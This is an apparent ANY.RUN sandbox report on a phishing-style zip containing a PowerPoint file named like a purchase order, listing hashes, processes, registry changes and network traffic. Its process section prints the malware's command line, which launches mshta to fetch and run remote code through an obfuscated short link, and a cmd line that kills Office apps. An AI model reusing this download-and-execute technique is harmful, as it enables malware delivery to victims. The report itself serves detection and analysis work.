File name: PO00187.zip
Full analysis: https://app.any.run/tasks/43a9e69a-b94a-4e1c-88c6-1f2118456f77
Verdict: Malicious activity
Analysis date: May 25, 2024, 01:46:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: AEFBF777BC7D03434D1F0B22B53D1098
SHA1: 95B8B8916851B31174A5E91478517E43FF48FBC8
SHA256: BF0A7997CF340B4C22A7206B22B682B29E73C0C315D5360C189ED18032C58051
SSDEEP: 768:PSEb25xLiOKiEqiW3p2F9HtN/urCtXBKSLVaLHiYpFKYlqnLF1GbmmU5q3GO1fc0:bbiKTnep2F9HtN/qCtXVa+YpTl4LF1Gp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from MS Office: POWERPNT.EXE (PID: 4036)
    • Modifies registry startup key (SCRIPT): mshta.exe (PID: 1200)
    • Creates a new registry key or changes the value of an existing one (SCRIPT): mshta.exe (PID: 1200)
  • SUSPICIOUS
    • Reads the Internet Settings: mshta.exe (PID: 1200)
    • Runs shell command (SCRIPT): POWERPNT.EXE (PID: 4036), mshta.exe (PID: 1200)
    • Uses TASKKILL.EXE to kill Office Apps: cmd.exe (PID: 1884)
    • Starts CMD.EXE for commands execution: mshta.exe (PID: 1200)
  • INFO
    • Reads Microsoft Office registry keys: WinRAR.exe (PID: 3980)
    • Checks proxy server information: mshta.exe (PID: 1200)
    • Manual execution by a user: wmpnscfg.exe (PID: 1620)
    • Reads the computer name: wmpnscfg.exe (PID: 1620)
    • Checks supported languages: wmpnscfg.exe (PID: 1620)
    • Reads CPU info: mshta.exe (PID: 1200)
    • Reads Internet Explorer settings: mshta.exe (PID: 1200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP)

ZipFileName: PO#00187.ppt
ZipUncompressedSize: 136192
ZipCompressedSize: 44466
ZipCRC: 0xd2149f9e
ZipModifyDate: 2021:02:25 17:52:06
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 45
Monitored processes: 9
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Processes in the graph: winrar.exe (no specs), powerpnt.exe (no specs), mshta.exe, ping.exe (no specs), winword.exe (no specs), wmpnscfg.exe (no specs), cmd.exe (no specs), taskkill.exe (no specs), taskkill.exe (no specs)

Process information

PID 3980 (parent: explorer.exe)
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\PO00187.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
User: admin | Company: Alexander Roshal | Integrity level: MEDIUM
Description: WinRAR archiver | Version: 5.91.0
PID 4036 (parent: WinRAR.exe)
CMD: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3980.39004\PO#00187.ppt"
Path: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Microsoft PowerPoint | Version: 14.0.6009.1000
PID 1200 (parent: POWERPNT.EXE)
CMD: mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsa
Path: C:\Windows\System32\mshta.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Microsoft (R) HTML Application host | Exit code: 3221225547 | Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
PID 1440 (parent: POWERPNT.EXE)
CMD: ping
Path: C:\Windows\System32\PING.EXE
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: TCP/IP Ping Command | Exit code: 1 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID 2180 (parent: POWERPNT.EXE)
CMD: winword
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Microsoft Word | Exit code: 1 | Version: 14.0.6024.1000
PID 1620 (parent: explorer.exe)
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Windows Media Player Network Sharing Service Configuration Application | Exit code: 0 | Version: 12.0.7600.16385 (win7_rtm.090713-1255)
PID 1884 (parent: mshta.exe)
CMD: "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Path: C:\Windows\System32\cmd.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Windows Command Processor | Exit code: 128 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID 1804 (parent: cmd.exe)
CMD: taskkill /f /im winword.exe
Path: C:\Windows\System32\taskkill.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Terminates Processes | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID 2556 (parent: cmd.exe)
CMD: taskkill /f /im EXCEL.exe
Path: C:\Windows\System32\taskkill.exe
User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM
Description: Terminates Processes | Exit code: 128 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 17 385
Read events: 16 625
Write events: 602
Delete events: 158

Modification events

(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | Operation: write | Name: ShellExtBMP | Value: (empty)
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | Operation: write | Name: ShellExtIcon | Value: (empty)
(3980) WinRAR.exe | Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E | Operation: write | Name: LanguageList | Value: en-US
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | Operation: write | Name: 3 | Value: C:\Users\admin\Desktop\phacker.zip
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | Operation: write | Name: 1 | Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | Operation: write | Name: 0 | Value: C:\Users\admin\AppData\Local\Temp\PO00187.zip
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | Operation: write | Name: name | Value: 120
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | Operation: write | Name: size | Value: 80
(3980) WinRAR.exe | Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | Operation: write | Name: type | Value: 120
Executable files: 0
Suspicious files: 26
Text files: 15
Unknown types: 0

Dropped files

PID 4036, POWERPNT.EXE: C:\Users\admin\AppData\Local\Temp\CVRC0B2.tmp.cvr
  Type: - | MD5: - | SHA256: -
PID 2180, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVR1124.tmp.cvr
  Type: - | MD5: - | SHA256: -
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Type: binary | MD5: 41511994EA36CE6423CE579D28515377 | SHA256: 7C8DE661C592E0BFA09B241BB2E5E372756BBE2281989DAED9CBC5EE7E824B7E
PID 2180, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: binary | MD5: 2B03871AC75694E6A00AD31B2E50B84E | SHA256: 01B00ADC7AD89DEF3CA3250983495A54EFB10E50F842F8C1F3C0F011B3D20BF3
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
  Type: binary | MD5: A3C83BA7A9459112192D5561351E0C00 | SHA256: 59CAE60257360657B02F10856C0E390AF53FCF9638E08A5E65613D3DB6771BAA
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_84F2D26713B03AC2BA719BC2585CCFC4
  Type: binary | MD5: 6CA0B66CD515CC0C20029EC0A892385A | SHA256: 8CA980D96E21F3D6CA53B96323A3BD9A4C159D29800A632A1893C82E52E41F2F
PID 1200, mshta.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\3566091532-css_bundle_v2[1].css
  Type: text | MD5: 1E32420A7B6DDBDCB7DEF8B3141C4D1E | SHA256: A9CA837900B6AE007386D400F659C233120B8AF7D93407FD6475C9180D9E83D2
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Type: binary | MD5: 3BFB237D95F9C34465D50360F39B3CEB | SHA256: 2CEADDB29268E6112E7AA95722894FB061238AD4E2B247CE23595609DAA5EB8D
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
  Type: binary | MD5: 8D1040B12A663CA4EC7277CFC1CE44F0 | SHA256: 3086094D4198A5BBD12938B0D2D5F696C4DFC77E1EAE820ADDED346A59AA8727
PID 1200, mshta.exe: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
  Type: binary | MD5: B13FF1DD8418C1252DB8BC6C305D5348 | SHA256: 3A7471436322E4F4C3B86FD86BF57A19469004AF420688B697CEB5A504F371B4
HTTP(S) requests: 12
TCP/UDP connections: 21
DNS requests: 15
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1200 | mshta.exe | GET | 301 | 67.199.248.16:80 | http://j.mp/hdkjashdkasbctdgjsa | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://c.pki.goog/r/r1.crl | unknown | - | - | unknown
1200 | mshta.exe | GET | 304 | 2.19.126.151:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?901ef983ada5e499 | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEDgXCzjQFnt3Ek2v0qh%2Fpmw%3D | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDcoc6fqZ4zlBD%2FfhdqltwL | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCJpTHr%2BknHZxDj7EG2XHs5 | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD52znXgmjnXwogfY0LOz7q | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGeOmj4kEWGqCUapKcz1epE%3D | unknown | - | - | unknown
1200 | mshta.exe | GET | 200 | 142.250.185.227:80 | http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDZoox0IQ8m3xC1TREVzbmV | unknown | - | - | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1088 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
1200 | mshta.exe | 67.199.248.16:80 | j.mp | GOOGLE-CLOUD-PLATFORM | US | shared
1200 | mshta.exe | 142.250.184.225:443 | iknowyoudidntlikeme.blogspot.com | GOOGLE | US | whitelisted
1200 | mshta.exe | 2.19.126.151:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown
1200 | mshta.exe | 142.250.185.227:80 | ocsp.pki.goog | GOOGLE | US | whitelisted
1200 | mshta.exe | 142.250.184.201:443 | www.blogger.com | GOOGLE | US | unknown
1200 | mshta.exe | 64.233.167.84:443 | accounts.google.com | GOOGLE | US | unknown
1200 | mshta.exe | 142.250.184.196:443 | www.google.com | GOOGLE | US | whitelisted

DNS requests

Domain | IP | Reputation
j.mp | 67.199.248.16, 67.199.248.17 | unknown
iknowyoudidntlikeme.blogspot.com | 142.250.184.225 | whitelisted
ctldl.windowsupdate.com | 2.19.126.151, 2.19.126.137 | whitelisted
ocsp.pki.goog | 142.250.185.227 | whitelisted
c.pki.goog | 142.250.185.227 | unknown
o.pki.goog | 142.250.185.227 | unknown
www.blogger.com | 142.250.184.201 | shared
accounts.google.com | 64.233.167.84 | shared
resources.blogblog.com | 142.250.184.201 | whitelisted
fonts.googleapis.com | 142.250.186.74 | whitelisted

Threats: No threats detected
Debug info: none